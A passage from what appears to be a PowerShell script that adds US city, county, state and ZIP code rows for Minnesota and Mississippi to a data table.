$Cities.Rows.Add("Royalton","Morrison","Minnesota","MN","27","56373") + $null = $Cities.Rows.Add("Saint joseph","Stearns","Minnesota","MN","27","56374") + $null = $Cities.Rows.Add("Saint stephen","Stearns","Minnesota","MN","27","56375") + $null = $Cities.Rows.Add("Saint martin","Stearns","Minnesota","MN","27","56376") + $null = $Cities.Rows.Add("Sartell","Stearns","Minnesota","MN","27","56377") + $null = $Cities.Rows.Add("Sauk centre","Stearns","Minnesota","MN","27","56378") + $null = $Cities.Rows.Add("Sauk rapids","Benton","Minnesota","MN","27","56379") + $null = $Cities.Rows.Add("Starbuck","Pope","Minnesota","MN","27","56381") + $null = $Cities.Rows.Add("Swanville","Morrison","Minnesota","MN","27","56382") + $null = $Cities.Rows.Add("Upsala","Morrison","Minnesota","MN","27","56384") + $null = $Cities.Rows.Add("Villard","Pope","Minnesota","MN","27","56385") + $null = $Cities.Rows.Add("Wahkon","Mille Lacs","Minnesota","MN","27","56386") + $null = $Cities.Rows.Add("Waite park","Stearns","Minnesota","MN","27","56387") + $null = $Cities.Rows.Add("Zcta 563hh","Benton","Minnesota","MN","27","563HH") + $null = $Cities.Rows.Add("East gull lake","Crow Wing","Minnesota","MN","27","56401") + $null = $Cities.Rows.Add("Baxter","Crow Wing","Minnesota","MN","27","56425") + $null = $Cities.Rows.Add("Aitkin","Aitkin","Minnesota","MN","27","56431") + $null = $Cities.Rows.Add("Akeley","Hubbard","Minnesota","MN","27","56433") + $null = $Cities.Rows.Add("Aldrich","Wadena","Minnesota","MN","27","56434") + $null = $Cities.Rows.Add("Backus","Cass","Minnesota","MN","27","56435") + $null = $Cities.Rows.Add("Benedict","Hubbard","Minnesota","MN","27","56436") + $null = $Cities.Rows.Add("Bertha","Todd","Minnesota","MN","27","56437") + $null = $Cities.Rows.Add("Browerville","Todd","Minnesota","MN","27","56438") + $null = $Cities.Rows.Add("Clarissa","Todd","Minnesota","MN","27","56440") + $null = $Cities.Rows.Add("Crosby","Crow Wing","Minnesota","MN","27","56441") + $null = $Cities.Rows.Add("Crosslake","Crow Wing","Minnesota","MN","27","56442") + $null = $Cities.Rows.Add("Cushing","Morrison","Minnesota","MN","27","56443") + $null = $Cities.Rows.Add("Deerwood","Crow Wing","Minnesota","MN","27","56444") + $null = $Cities.Rows.Add("Eagle bend","Todd","Minnesota","MN","27","56446") + $null = $Cities.Rows.Add("Emily","Crow Wing","Minnesota","MN","27","56447") + $null = $Cities.Rows.Add("Fifty lakes","Crow Wing","Minnesota","MN","27","56448") + $null = $Cities.Rows.Add("Fort ripley","Crow Wing","Minnesota","MN","27","56449") + $null = $Cities.Rows.Add("Garrison","Crow Wing","Minnesota","MN","27","56450") + $null = $Cities.Rows.Add("Hackensack","Cass","Minnesota","MN","27","56452") + $null = $Cities.Rows.Add("Hewitt","Todd","Minnesota","MN","27","56453") + $null = $Cities.Rows.Add("Ironton","Crow Wing","Minnesota","MN","27","56455") + $null = $Cities.Rows.Add("Jenkins","Crow Wing","Minnesota","MN","27","56456") + $null = $Cities.Rows.Add("Lake george","Hubbard","Minnesota","MN","27","56458") + $null = $Cities.Rows.Add("Laporte","Hubbard","Minnesota","MN","27","56461") + $null = $Cities.Rows.Add("Menahga","Wadena","Minnesota","MN","27","56464") + $null = $Cities.Rows.Add("Merrifield","Crow Wing","Minnesota","MN","27","56465") + $null = $Cities.Rows.Add("Leader","Morrison","Minnesota","MN","27","56466") + $null = $Cities.Rows.Add("Nevis","Hubbard","Minnesota","MN","27","56467") + $null = $Cities.Rows.Add("Lake shore","Crow Wing","Minnesota","MN","27","56468") + $null = $Cities.Rows.Add("Palisade","Aitkin","Minnesota","MN","27","56469") + $null = $Cities.Rows.Add("Park rapids","Hubbard","Minnesota","MN","27","56470") + $null = $Cities.Rows.Add("Pequot lakes","Crow Wing","Minnesota","MN","27","56472") + $null = $Cities.Rows.Add("Pillager","Cass","Minnesota","MN","27","56473") + $null = $Cities.Rows.Add("Pine river","Cass","Minnesota","MN","27","56474") + $null = $Cities.Rows.Add("Randall","Morrison","Minnesota","MN","27","56475") + $null = $Cities.Rows.Add("Sebeka","Wadena","Minnesota","MN","27","56477") + $null = $Cities.Rows.Add("Staples","Todd","Minnesota","MN","27","56479") + $null = $Cities.Rows.Add("Verndale","Wadena","Minnesota","MN","27","56481") + $null = $Cities.Rows.Add("Wadena","Wadena","Minnesota","MN","27","56482") + $null = $Cities.Rows.Add("Walker","Cass","Minnesota","MN","27","56484") + $null = $Cities.Rows.Add("Zcta 564hh","Cass","Minnesota","MN","27","564HH") + $null = $Cities.Rows.Add("Zcta 564xx","Clearwater","Minnesota","MN","27","564XX") + $null = $Cities.Rows.Add("Detroit lakes","Becker","Minnesota","MN","27","56501") + $null = $Cities.Rows.Add("Lockhart","Norman","Minnesota","MN","27","56510") + $null = $Cities.Rows.Add("Audubon","Becker","Minnesota","MN","27","56511") + $null = $Cities.Rows.Add("Baker","Clay","Minnesota","MN","27","56513") + $null = $Cities.Rows.Add("Downer","Clay","Minnesota","MN","27","56514") + $null = $Cities.Rows.Add("Battle lake","Otter Tail","Minnesota","MN","27","56515") + $null = $Cities.Rows.Add("Bejou","Mahnomen","Minnesota","MN","27","56516") + $null = $Cities.Rows.Add("Beltrami","Polk","Minnesota","MN","27","56517") + $null = $Cities.Rows.Add("Bluffton","Otter Tail","Minnesota","MN","27","56518") + $null = $Cities.Rows.Add("Borup","Norman","Minnesota","MN","27","56519") + $null = $Cities.Rows.Add("Breckenridge","Wilkin","Minnesota","MN","27","56520") + $null = $Cities.Rows.Add("Callaway","Becker","Minnesota","MN","27","56521") + $null = $Cities.Rows.Add("Doran","Wilkin","Minnesota","MN","27","56522") + $null = $Cities.Rows.Add("Eldred","Polk","Minnesota","MN","27","56523") + $null = $Cities.Rows.Add("Clitherall","Otter Tail","Minnesota","MN","27","56524") + $null = $Cities.Rows.Add("Comstock","Clay","Minnesota","MN","27","56525") + $null = $Cities.Rows.Add("Deer creek","Otter Tail","Minnesota","MN","27","56527") + $null = $Cities.Rows.Add("Dent","Otter Tail","Minnesota","MN","27","56528") + $null = $Cities.Rows.Add("Dilworth","Clay","Minnesota","MN","27","56529") + $null = $Cities.Rows.Add("Elbow lake","Grant","Minnesota","MN","27","56531") + $null = $Cities.Rows.Add("Elizabeth","Otter Tail","Minnesota","MN","27","56533") + $null = $Cities.Rows.Add("Erhard","Otter Tail","Minnesota","MN","27","56534") + $null = $Cities.Rows.Add("Erskine","Polk","Minnesota","MN","27","56535") + $null = $Cities.Rows.Add("Felton","Clay","Minnesota","MN","27","56536") + $null = $Cities.Rows.Add("Carlisle","Otter Tail","Minnesota","MN","27","56537") + $null = $Cities.Rows.Add("Fertile","Polk","Minnesota","MN","27","56540") + $null = $Cities.Rows.Add("Fosston","Polk","Minnesota","MN","27","56542") + $null = $Cities.Rows.Add("Foxhome","Wilkin","Minnesota","MN","27","56543") + $null = $Cities.Rows.Add("Frazee","Becker","Minnesota","MN","27","56544") + $null = $Cities.Rows.Add("Gary","Norman","Minnesota","MN","27","56545") + $null = $Cities.Rows.Add("Georgetown","Clay","Minnesota","MN","27","56546") + $null = $Cities.Rows.Add("Glyndon","Clay","Minnesota","MN","27","56547") + $null = $Cities.Rows.Add("Halstad","Norman","Minnesota","MN","27","56548") + $null = $Cities.Rows.Add("Rollag","Clay","Minnesota","MN","27","56549") + $null = $Cities.Rows.Add("Hendrum","Norman","Minnesota","MN","27","56550") + $null = $Cities.Rows.Add("Henning","Otter Tail","Minnesota","MN","27","56551") + $null = $Cities.Rows.Add("Hitterdal","Clay","Minnesota","MN","27","56552") + $null = $Cities.Rows.Add("Kent","Wilkin","Minnesota","MN","27","56553") + $null = $Cities.Rows.Add("Lake park","Becker","Minnesota","MN","27","56554") + $null = $Cities.Rows.Add("Mcintosh","Polk","Minnesota","MN","27","56556") + $null = $Cities.Rows.Add("Mahnomen","Mahnomen","Minnesota","MN","27","56557") + $null = $Cities.Rows.Add("Moorhead","Clay","Minnesota","MN","27","56560") + $null = $Cities.Rows.Add("Nashua","Wilkin","Minnesota","MN","27","56565") + $null = $Cities.Rows.Add("Naytahwaush","Mahnomen","Minnesota","MN","27","56566") + $null = $Cities.Rows.Add("New york mills","Otter Tail","Minnesota","MN","27","56567") + $null = $Cities.Rows.Add("Nielsville","Polk","Minnesota","MN","27","56568") + $null = $Cities.Rows.Add("Ogema","Becker","Minnesota","MN","27","56569") + $null = $Cities.Rows.Add("Osage","Becker","Minnesota","MN","27","56570") + $null = $Cities.Rows.Add("Ottertail","Otter Tail","Minnesota","MN","27","56571") + $null = $Cities.Rows.Add("Pelican rapids","Otter Tail","Minnesota","MN","27","56572") + $null = $Cities.Rows.Add("Perham","Otter Tail","Minnesota","MN","27","56573") + $null = $Cities.Rows.Add("Perley","Norman","Minnesota","MN","27","56574") + $null = $Cities.Rows.Add("Ponsford","Becker","Minnesota","MN","27","56575") + $null = $Cities.Rows.Add("Richville","Otter Tail","Minnesota","MN","27","56576") + $null = $Cities.Rows.Add("Rochert","Becker","Minnesota","MN","27","56578") + $null = $Cities.Rows.Add("Rothsay","Wilkin","Minnesota","MN","27","56579") + $null = $Cities.Rows.Add("Sabin","Clay","Minnesota","MN","27","56580") + $null = $Cities.Rows.Add("Shelly","Norman","Minnesota","MN","27","56581") + $null = $Cities.Rows.Add("Tenney","Traverse","Minnesota","MN","27","56583") + $null = $Cities.Rows.Add("Twin valley","Norman","Minnesota","MN","27","56584") + $null = $Cities.Rows.Add("Ulen","Clay","Minnesota","MN","27","56585") + $null = $Cities.Rows.Add("Underwood","Otter Tail","Minnesota","MN","27","56586") + $null = $Cities.Rows.Add("Vergas","Otter Tail","Minnesota","MN","27","56587") + $null = $Cities.Rows.Add("Vining","Otter Tail","Minnesota","MN","27","56588") + $null = $Cities.Rows.Add("Waubun","Mahnomen","Minnesota","MN","27","56589") + $null = $Cities.Rows.Add("Wendell","Grant","Minnesota","MN","27","56590") + $null = $Cities.Rows.Add("Winger","Polk","Minnesota","MN","27","56592") + $null = $Cities.Rows.Add("Wolverton","Wilkin","Minnesota","MN","27","56594") + $null = $Cities.Rows.Add("Zcta 565hh","Becker","Minnesota","MN","27","565HH") + $null = $Cities.Rows.Add("Zcta 565xx","Norman","Minnesota","MN","27","565XX") + $null = $Cities.Rows.Add("Bemidji","Beltrami","Minnesota","MN","27","56601") + $null = $Cities.Rows.Add("Bagley","Clearwater","Minnesota","MN","27","56621") + $null = $Cities.Rows.Add("Baudette","Lake of the Woods","Minnesota","MN","27","56623") + $null = $Cities.Rows.Add("Bena","Cass","Minnesota","MN","27","56626") + $null = $Cities.Rows.Add("Big falls","Koochiching","Minnesota","MN","27","56627") + $null = $Cities.Rows.Add("Bigfork","Itasca","Minnesota","MN","27","56628") + $null = $Cities.Rows.Add("Birchdale","Koochiching","Minnesota","MN","27","56629") + $null = $Cities.Rows.Add("Blackduck","Beltrami","Minnesota","MN","27","56630") + $null = $Cities.Rows.Add("Cass lake","Cass","Minnesota","MN","27","56633") + $null = $Cities.Rows.Add("Clearbrook","Clearwater","Minnesota","MN","27","56634") + $null = $Cities.Rows.Add("Deer river","Itasca","Minnesota","MN","27","56636") + $null = $Cities.Rows.Add("Talmoon","Itasca","Minnesota","MN","27","56637") + $null = $Cities.Rows.Add("Effie","Itasca","Minnesota","MN","27","56639") + $null = $Cities.Rows.Add("Federal dam","Cass","Minnesota","MN","27","56641") + $null = $Cities.Rows.Add("Gonvick","Clearwater","Minnesota","MN","27","56644") + $null = $Cities.Rows.Add("Gully","Polk","Minnesota","MN","27","56646") + $null = $Cities.Rows.Add("Hines","Beltrami","Minnesota","MN","27","56647") + $null = $Cities.Rows.Add("International fa","Koochiching","Minnesota","MN","27","56649") + $null = $Cities.Rows.Add("Kelliher","Beltrami","Minnesota","MN","27","56650") + $null = $Cities.Rows.Add("Lengby","Mahnomen","Minnesota","MN","27","56651") + $null = $Cities.Rows.Add("Leonard","Clearwater","Minnesota","MN","27","56652") + $null = $Cities.Rows.Add("Littlefork","Koochiching","Minnesota","MN","27","56653") + $null = $Cities.Rows.Add("Loman","Koochiching","Minnesota","MN","27","56654") + $null = $Cities.Rows.Add("Longville","Cass","Minnesota","MN","27","56655") + $null = $Cities.Rows.Add("Marcell","Itasca","Minnesota","MN","27","56657") + $null = $Cities.Rows.Add("Max","Itasca","Minnesota","MN","27","56659") + $null = $Cities.Rows.Add("Mizpah","Koochiching","Minnesota","MN","27","56660") + $null = $Cities.Rows.Add("Northome","Koochiching","Minnesota","MN","27","56661") + $null = $Cities.Rows.Add("Outing","Cass","Minnesota","MN","27","56662") + $null = $Cities.Rows.Add("Pennington","Beltrami","Minnesota","MN","27","56663") + $null = $Cities.Rows.Add("Ponemah","Beltrami","Minnesota","MN","27","56666") + $null = $Cities.Rows.Add("Puposky","Beltrami","Minnesota","MN","27","56667") + $null = $Cities.Rows.Add("Ray","Koochiching","Minnesota","MN","27","56669") + $null = $Cities.Rows.Add("Redby","Beltrami","Minnesota","MN","27","56670") + $null = $Cities.Rows.Add("Redlake","Beltrami","Minnesota","MN","27","56671") + $null = $Cities.Rows.Add("Remer","Cass","Minnesota","MN","27","56672") + $null = $Cities.Rows.Add("Roosevelt","Roseau","Minnesota","MN","27","56673") + $null = $Cities.Rows.Add("Shevlin","Clearwater","Minnesota","MN","27","56676") + $null = $Cities.Rows.Add("Solway","Beltrami","Minnesota","MN","27","56678") + $null = $Cities.Rows.Add("Spring lake","Itasca","Minnesota","MN","27","56680") + $null = $Cities.Rows.Add("Squaw lake","Itasca","Minnesota","MN","27","56681") + $null = $Cities.Rows.Add("Tenstrike","Beltrami","Minnesota","MN","27","56683") + $null = $Cities.Rows.Add("Trail","Polk","Minnesota","MN","27","56684") + $null = $Cities.Rows.Add("Waskish","Beltrami","Minnesota","MN","27","56685") + $null = $Cities.Rows.Add("Williams","Lake of the Woods","Minnesota","MN","27","56686") + $null = $Cities.Rows.Add("Wilton","Beltrami","Minnesota","MN","27","56687") + $null = $Cities.Rows.Add("Wirt","Itasca","Minnesota","MN","27","56688") + $null = $Cities.Rows.Add("Zcta 566hh","Beltrami","Minnesota","MN","27","566HH") + $null = $Cities.Rows.Add("Zcta 566xx","Clearwater","Minnesota","MN","27","566XX") + $null = $Cities.Rows.Add("Thief river fall","Pennington","Minnesota","MN","27","56701") + $null = $Cities.Rows.Add("Alvarado","Marshall","Minnesota","MN","27","56710") + $null = $Cities.Rows.Add("Angle inlet","Lake of the Woods","Minnesota","MN","27","56711") + $null = $Cities.Rows.Add("Angus","Polk","Minnesota","MN","27","56712") + $null = $Cities.Rows.Add("Argyle","Marshall","Minnesota","MN","27","56713") + $null = $Cities.Rows.Add("Badger","Roseau","Minnesota","MN","27","56714") + $null = $Cities.Rows.Add("Brooks","Red Lake","Minnesota","MN","27","56715") + $null = $Cities.Rows.Add("Crookston","Polk","Minnesota","MN","27","56716") + $null = $Cities.Rows.Add("Donaldson","Kittson","Minnesota","MN","27","56720") + $null = $Cities.Rows.Add("East grand forks","Polk","Minnesota","MN","27","56721") + $null = $Cities.Rows.Add("Euclid","Polk","Minnesota","MN","27","56722") + $null = $Cities.Rows.Add("Fisher","Polk","Minnesota","MN","27","56723") + $null = $Cities.Rows.Add("Gatzke","Marshall","Minnesota","MN","27","56724") + $null = $Cities.Rows.Add("Goodridge","Pennington","Minnesota","MN","27","56725") + $null = $Cities.Rows.Add("Greenbush","Roseau","Minnesota","MN","27","56726") + $null = $Cities.Rows.Add("Grygla","Marshall","Minnesota","MN","27","56727") + $null = $Cities.Rows.Add("Hallock","Kittson","Minnesota","MN","27","56728") + $null = $Cities.Rows.Add("Halma","Kittson","Minnesota","MN","27","56729") + $null = $Cities.Rows.Add("Humboldt","Kittson","Minnesota","MN","27","56731") + $null = $Cities.Rows.Add("Karlstad","Kittson","Minnesota","MN","27","56732") + $null = $Cities.Rows.Add("Kennedy","Kittson","Minnesota","MN","27","56733") + $null = $Cities.Rows.Add("Lake bronson","Kittson","Minnesota","MN","27","56734") + $null = $Cities.Rows.Add("Orleans","Kittson","Minnesota","MN","27","56735") + $null = $Cities.Rows.Add("Mentor","Polk","Minnesota","MN","27","56736") + $null = $Cities.Rows.Add("Middle river","Marshall","Minnesota","MN","27","56737") + $null = $Cities.Rows.Add("Newfolden","Marshall","Minnesota","MN","27","56738") + $null = $Cities.Rows.Add("Oak island","Lake of the Woods","Minnesota","MN","27","56741") + $null = $Cities.Rows.Add("Oklee","Red Lake","Minnesota","MN","27","56742") + $null = $Cities.Rows.Add("Oslo","Marshall","Minnesota","MN","27","56744") + $null = $Cities.Rows.Add("Plummer","Red Lake","Minnesota","MN","27","56748") + $null = $Cities.Rows.Add("Red lake falls","Red Lake","Minnesota","MN","27","56750") + $null = $Cities.Rows.Add("Pencer","Roseau","Minnesota","MN","27","56751") + $null = $Cities.Rows.Add("Saint hilaire","Pennington","Minnesota","MN","27","56754") + $null = $Cities.Rows.Add("Saint vincent","Kittson","Minnesota","MN","27","56755") + $null = $Cities.Rows.Add("Salol","Roseau","Minnesota","MN","27","56756") + $null = $Cities.Rows.Add("Stephen","Marshall","Minnesota","MN","27","56757") + $null = $Cities.Rows.Add("Strandquist","Marshall","Minnesota","MN","27","56758") + $null = $Cities.Rows.Add("Strathcona","Roseau","Minnesota","MN","27","56759") + $null = $Cities.Rows.Add("Viking","Marshall","Minnesota","MN","27","56760") + $null = $Cities.Rows.Add("Wannaska","Roseau","Minnesota","MN","27","56761") + $null = $Cities.Rows.Add("Radium","Marshall","Minnesota","MN","27","56762") + $null = $Cities.Rows.Add("Warroad","Roseau","Minnesota","MN","27","56763") + $null = $Cities.Rows.Add("Zcta 567hh","Beltrami","Minnesota","MN","27","567HH") + $null = $Cities.Rows.Add("Zcta 567xx","Marshall","Minnesota","MN","27","567XX") + $null = $Cities.Rows.Add("","Kittson","Minnesota","MN","27","582HH") + $null = $Cities.Rows.Add("Abbeville","Lafayette","Mississippi","MS","28","38601") + $null = $Cities.Rows.Add("Cannon","Benton","Mississippi","MS","28","38603") + $null = $Cities.Rows.Add("Batesville","Panola","Mississippi","MS","28","38606") + $null = $Cities.Rows.Add("Belen","Quitman","Mississippi","MS","28","38609") + $null = $Cities.Rows.Add("Blue mountain","Tippah","Mississippi","MS","28","38610") + $null = $Cities.Rows.Add("Byhalia","Marshall","Mississippi","MS","28","38611") + $null = $Cities.Rows.Add("Stovall","Coahoma","Mississippi","MS","28","38614") + $null = $Cities.Rows.Add("Coahoma","Coahoma","Mississippi","MS","28","38617") + $null = $Cities.Rows.Add("Coldwater","Tate","Mississippi","MS","28","38618") + $null = $Cities.Rows.Add("Como","Panola","Mississippi","MS","28","38619") + $null = $Cities.Rows.Add("Courtland","Panola","Mississippi","MS","28","38620") + $null = $Cities.Rows.Add("Askew","Panola","Mississippi","MS","28","38621") + $null = $Cities.Rows.Add("Crowder","Quitman","Mississippi","MS","28","38622") + $null = $Cities.Rows.Add("Darling","Quitman","Mississippi","MS","28","38623") + $null = $Cities.Rows.Add("Dumas","Tippah","Mississippi","MS","28","38625") + $null = $Cities.Rows.Add("Dundee","Tunica","Mississippi","MS","28","38626") + $null = $Cities.Rows.Add("Etta","Union","Mississippi","MS","28","38627") + $null = $Cities.Rows.Add("Falkner","Tippah","Mississippi","MS","28","38629") + $null = $Cities.Rows.Add("Farrell","Coahoma","Mississippi","MS","28","38630") + $null = $Cities.Rows.Add("Friars point","Coahoma","Mississippi","MS","28","38631") + $null = $Cities.Rows.Add("Hernando","DeSoto","Mississippi","MS","28","38632") + $null = $Cities.Rows.Add("Hickory flat","Benton","Mississippi","MS","28","38633") + $null = $Cities.Rows.Add("Holly springs","Marshall","Mississippi","MS","28","38635") + $null = $Cities.Rows.Add("Horn lake","DeSoto","Mississippi","MS","28","38637") + $null = $Cities.Rows.Add("Jonestown","Coahoma","Mississippi","MS","28","38639") + $null = $Cities.Rows.Add("Lake cormorant","DeSoto","Mississippi","MS","28","38641") + $null = $Cities.Rows.Add("Lamar","Benton","Mississippi","MS","28","38642") + $null = $Cities.Rows.Add("Lambert","Quitman","Mississippi","MS","28","38643") + $null = $Cities.Rows.Add("Lula","Coahoma","Mississippi","MS","28","38644") + $null = $Cities.Rows.Add("Lyon","Coahoma","Mississippi","MS","28","38645") + $null = $Cities.Rows.Add("Marks","Quitman","Mississippi","MS","28","38646") + $null = $Cities.Rows.Add("Michigan city","Benton","Mississippi","MS","28","38647") + $null = $Cities.Rows.Add("Mount pleasant","Marshall","Mississippi","MS","28","38649") + $null = $Cities.Rows.Add("Myrtle","Union","Mississippi","MS","28","38650") + $null = $Cities.Rows.Add("Nesbit","DeSoto","Mississippi","MS","28","38651") + $null = $Cities.Rows.Add("New albany","Union","Mississippi","MS","28","38652") + $null = $Cities.Rows.Add("Olive branch","DeSoto","Mississippi","MS","28","38654") + $null = $Cities.Rows.Add("Lafayette","Lafayette","Mississippi","MS","28","38655") + $null = $Cities.Rows.Add("Pope","Panola","Mississippi","MS","28","38658") + $null = $Cities.Rows.Add("Potts camp","Marshall","Mississippi","MS","28","38659") + $null = $Cities.Rows.Add("Red banks","Marshall","Mississippi","MS","28","38661") + $null = $Cities.Rows.Add("Ripley","Tippah","Mississippi","MS","28","38663") + $null = $Cities.Rows.Add("Robinsonville","Tunica","Mississippi","MS","28","38664") + $null = $Cities.Rows.Add("Savage","Tate","Mississippi","MS","28","38665") + $null = $Cities.Rows.Add("Sardis","Panola","Mississippi","MS","28","38666") + $null = $Cities.Rows.Add("Senatobia","Tate","Mississippi","MS","28","38668") + $null = $Cities.Rows.Add("Clarksdale","Coahoma","Mississippi","MS","28","38669") + $null = $Cities.Rows.Add("Sledge","Quitman","Mississippi","MS","28","38670") + $null = $Cities.Rows.Add("Southaven","DeSoto","Mississippi","MS","28","38671") + $null = $Cities.Rows.Add("Zcta 38672","DeSoto","Mississippi","MS","28","38672") + $null = $Cities.Rows.Add("Taylor","Lafayette","Mississippi","MS","28","38673") + $null = $Cities.Rows.Add("Tiplersville","Tippah","Mississippi","MS","28","38674") + $null = $Cities.Rows.Add("Tunica","Tunica","Mississippi","MS","28","38676") + $null = $Cities.Rows.Add("University","Lafayette","Mississippi","MS","28","38677") + $null = $Cities.Rows.Add("Walls","DeSoto","Mississippi","MS","28","38680") + $null = $Cities.Rows.Add("Walnut","Tippah","Mississippi","MS","28","38683") + $null = $Cities.Rows.Add("Waterford","Lafayette","Mississippi","MS","28","38685") + $null = $Cities.Rows.Add("Zcta 386hh","Coahoma","Mississippi","MS","28","386HH") + $null = $Cities.Rows.Add("Zcta 386xx","Benton","Mississippi","MS","28","386XX") + $null = $Cities.Rows.Add("Greenville","Washington","Mississippi","MS","28","38701") + $null = $Cities.Rows.Add("Greenville","Washington","Mississippi","MS","28","38703") + $null = $Cities.Rows.Add("Alligator","Coahoma","Mississippi","MS","28","38720") + $null = $Cities.Rows.Add("Anguilla","Sharkey","Mississippi","MS","28","38721") + $null = $Cities.Rows.Add("Arcola","Washington","Mississippi","MS","28","38722") + $null = $Cities.Rows.Add("Avon","Washington","Mississippi","MS","28","38723") + $null = $Cities.Rows.Add("Benoit","Bolivar","Mississippi","MS","28","38725") + $null = $Cities.Rows.Add("Beulah","Bolivar","Mississippi","MS","28","38726") + $null = $Cities.Rows.Add("Boyle","Bolivar","Mississippi","MS","28","38730") + $null = $Cities.Rows.Add("Cleveland","Bolivar","Mississippi","MS","28","38732") + $null = $Cities.Rows.Add("Doddsville","Leflore","Mississippi","MS","28","38736") + $null = $Cities.Rows.Add("Drew","Sunflower","Mississippi","MS","28","38737") + $null = $Cities.Rows.Add("Parchman","Sunflower","Mississippi","MS","28","38738") + $null = $Cities.Rows.Add("Dublin","Coahoma","Mississippi","MS","28","38739") + $null = $Cities.Rows.Add("Duncan","Bolivar","Mississippi","MS","28","38740") + $null = $Cities.Rows.Add("Glen allan","Washington","Mississippi","MS","28","38744") + $null = $Cities.Rows.Add("Grace","Issaquena","Mississippi","MS","28","38745") + $null = $Cities.Rows.Add("Gunnison","Bolivar","Mississippi","MS","28","38746") + $null = $Cities.Rows.Add("Percy","Washington","Mississippi","MS","28","38748") + $null = $Cities.Rows.Add("Baird","Sunflower","Mississippi","MS","28","38751") + $null = $Cities.Rows.Add("Inverness","Sunflower","Mississippi","MS","28","38753") + $null = $Cities.Rows.Add("Isola","Humphreys","Mississippi","MS","28","38754") + $null = $Cities.Rows.Add("Elizabeth","Washington","Mississippi","MS","28","38756") + $null = $Cities.Rows.Add("Mattson","Coahoma","Mississippi","MS","28","38758") + $null = $Cities.Rows.Add("Merigold","Bolivar","Mississippi","MS","28","38759") + $null = $Cities.Rows.Add("Metcalfe","Washington","Mississippi","MS","28","38760") + $null = $Cities.Rows.Add("Moorhead","Sunflower","Mississippi","MS","28","38761") + $null = $Cities.Rows.Add("Mound bayou","Bolivar","Mississippi","MS","28","38762") + $null = $Cities.Rows.Add("Nitta yuma","Sharkey","Mississippi","MS","28","38763") + $null = $Cities.Rows.Add("Pace","Bolivar","Mississippi","MS","28","38764") + $null = $Cities.Rows.Add("Panther burn","Sharkey","Mississippi","MS","28","38765") + $null = $Cities.Rows.Add("Rena lara","Coahoma","Mississippi","MS","28","38767") + $null = $Cities.Rows.Add("Rome","Sunflower","Mississippi","MS","28","38768") + $null = $Cities.Rows.Add("Rosedale","Bolivar","Mississippi","MS","28","38769") + $null = $Cities.Rows.Add("Ruleville","Sunflower","Mississippi","MS","28","38771") + $null = $Cities.Rows.Add("Scott","Bolivar","Mississippi","MS","28","38772") + $null = $Cities.Rows.Add("Shaw","Bolivar","Mississippi","MS","28","38773") + $null = $Cities.Rows.Add("Shelby","Bolivar","Mississippi","MS","28","38774") + $null = $Cities.Rows.Add("Sunflower","Sunflower","Mississippi","MS","28","38778") + $null = $Cities.Rows.Add("Zcta 387hh","Humphreys","Mississippi","MS","28","387HH") + $null = $Cities.Rows.Add("Zcta 387xx","Bolivar","Mississippi","MS","28","387XX") + $null = $Cities.Rows.Add("Tupelo","Lee","Mississippi","MS","28","38801") + $null = $Cities.Rows.Add("Zcta 38804","Lee","Mississippi","MS","28","38804") + $null = $Cities.Rows.Add("Amory","Monroe","Mississippi","MS","28","38821") + $null = $Cities.Rows.Add("Baldwyn","Prentiss","Mississippi","MS","28","38824") + $null = $Cities.Rows.Add("Belden","Lee","Mississippi","MS","28","38826") + $null = $Cities.Rows.Add("Belmont","Tishomingo","Mississippi","MS","28","38827") + $null = $Cities.Rows.Add("Blue springs","Union","Mississippi","MS","28","38828") + $null = $Cities.Rows.Add("Booneville","Prentiss","Mississippi","MS","28","38829") + $null = $Cities.Rows.Add("Burnsville","Tishomingo","Mississippi","MS","28","38833") + $null = $Cities.Rows.Add("Kossuth","Alcorn","Mississippi","MS","28","38834") + $null = $Cities.Rows.Add("Dennis","Tishomingo","Mississippi","MS","28","38838") + $null = $Cities.Rows.Add("Ecru","Pontotoc","Mississippi","MS","28","38841") + $null = $Cities.Rows.Add("Fulton","Itawamba","Mississippi","MS","28","38843") + $null = $Cities.Rows.Add("Gattman","Monroe","Mississippi","MS","28","38844") + $null = $Cities.Rows.Add("Glen","Alcorn","Mississippi","MS","28","38846") + $null = $Cities.Rows.Add("Golden","Itawamba","Mississippi","MS","28","38847") + $null = $Cities.Rows.Add("Greenwood spring","Monroe","Mississippi","MS","28","38848") + $null = $Cities.Rows.Add("Guntown","Lee","Mississippi","MS","28","38849") + $null = $Cities.Rows.Add("Houlka","Chickasaw","Mississippi","MS","28","38850") + $null = $Cities.Rows.Add("Houston","Chickasaw","Mississippi","MS","28","38851") + $null = $Cities.Rows.Add("Iuka","Tishomingo","Mississippi","MS","28","38852") + $null = $Cities.Rows.Add("Mantachie","Itawamba","Mississippi","MS","28","38855") + $null = $Cities.Rows.Add("Marietta","Prentiss","Mississippi","MS","28","38856") + $null = $Cities.Rows.Add("Mooreville","Lee","Mississippi","MS","28","38857") + $null = $Cities.Rows.Add("Nettleton","Monroe","Mississippi","MS","28","38858") + $null = $Cities.Rows.Add("New site","Prentiss","Mississippi","MS","28","38859") + $null = $Cities.Rows.Add("Egypt","Chickasaw","Mississippi","MS","28","38860") + $null = $Cities.Rows.Add("Plantersville","Lee","Mississippi","MS","28","38862") + $null = $Cities.Rows.Add("Pontotoc","Pontotoc","Mississippi","MS","28","38863") + $null = $Cities.Rows.Add("Sarepta","Pontotoc","Mississippi","MS","28","38864") + $null = $Cities.Rows.Add("Rienzi","Alcorn","Mississippi","MS","28","38865") + $null = $Cities.Rows.Add("Saltillo","Lee","Mississippi","MS","28","38866") + $null = $Cities.Rows.Add("Shannon","Lee","Mississippi","MS","28","38868") + $null = $Cities.Rows.Add("Sherman","Pontotoc","Mississippi","MS","28","38869") + $null = $Cities.Rows.Add("Smithville","Monroe","Mississippi","MS","28","38870") + $null = $Cities.Rows.Add("Thaxton","Pontotoc","Mississippi","MS","28","38871") + $null = $Cities.Rows.Add("Tishomingo","Tishomingo","Mississippi","MS","28","38873") + $null = $Cities.Rows.Add("Toccopola","Pontotoc","Mississippi","MS","28","38874") + $null = $Cities.Rows.Add("Tremont","Itawamba","Mississippi","MS","28","38876") + $null = $Cities.Rows.Add("Vardaman","Calhoun","Mississippi","MS","28","38878") + $null = $Cities.Rows.Add("Verona","Lee","Mississippi","MS","28","38879") + $null = $Cities.Rows.Add("Wheeler","Prentiss","Mississippi","MS","28","38880") + $null = $Cities.Rows.Add("Zcta 388hh","Itawamba","Mississippi","MS","28","388HH") + $null = $Cities.Rows.Add("Grenada","Grenada","Mississippi","MS","28","38901") + $null = $Cities.Rows.Add("Banner","Calhoun","Mississippi","MS","28","38913") + $null = $Cities.Rows.Add("Big creek","Calhoun","Mississippi","MS","28","38914") + $null 